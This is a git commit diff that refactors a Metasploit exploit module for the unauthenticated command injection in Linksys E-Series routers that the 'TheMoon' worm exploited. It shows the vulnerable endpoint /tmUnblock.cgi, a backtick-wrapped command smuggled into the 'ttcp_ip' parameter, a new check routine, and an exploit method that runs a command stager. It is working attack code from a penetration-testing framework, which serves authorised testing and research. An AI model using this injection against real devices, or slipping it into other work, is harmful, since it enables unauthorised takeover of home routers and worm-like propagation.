Code clean up

2014-04-04 14:02:12 -05:00 · 2014-04-04 14:02:12 -05:00 · 0ae75860ea
parent 4319885420
commit 0ae75860ea
1 changed files with 33 additions and 30 deletions
--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@ -15,14 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
      'Description' => %q{
-          Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. Since it is a blind os command injection vulnerability, there is no
-        output for the executed command when using the cmd generic payload. A ping
-        command against a controlled system could be used for testing purposes. This
-        vulnerability was used from the so called "TheMoon" worm. There are many Systems
-        that might be vulnerable:
-        E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
-        module was tested against a E1500 v1.0.5.
+        Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
+        injection. This vulnerability was used from the so called "TheMoon" worm. There
+        are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
+        E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
+        successfully against an E1500 v1.0.5.
      },
      'Author'      =>
        [
@ -86,33 +83,39 @@ class Metasploit3 < Msf::Exploit::Remote
          "ttcp_ip" => "-h `#{cmd}`",
          "StartEPI" => "1"
        }
-      })
+      }, 2)
      return res
-    rescue ::Rex::ConnectionError
-      vprint_error("#{peer} - Failed to connect to the web server")
-      return nil
-    end
-  end
-
-  def exploit
-    print_status("#{peer} - Trying to access the vulnerable url")
-    begin
-      res = send_request_cgi({
-        'uri'     => '/tmUnblock.cgi',
-        'method'  => 'GET',
-      })
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successfully accessed the vulnerable url")
-      else
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
-      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
+  end

+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => '/tmUnblock.cgi',
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
    execute_cmdstager
  end
+
 end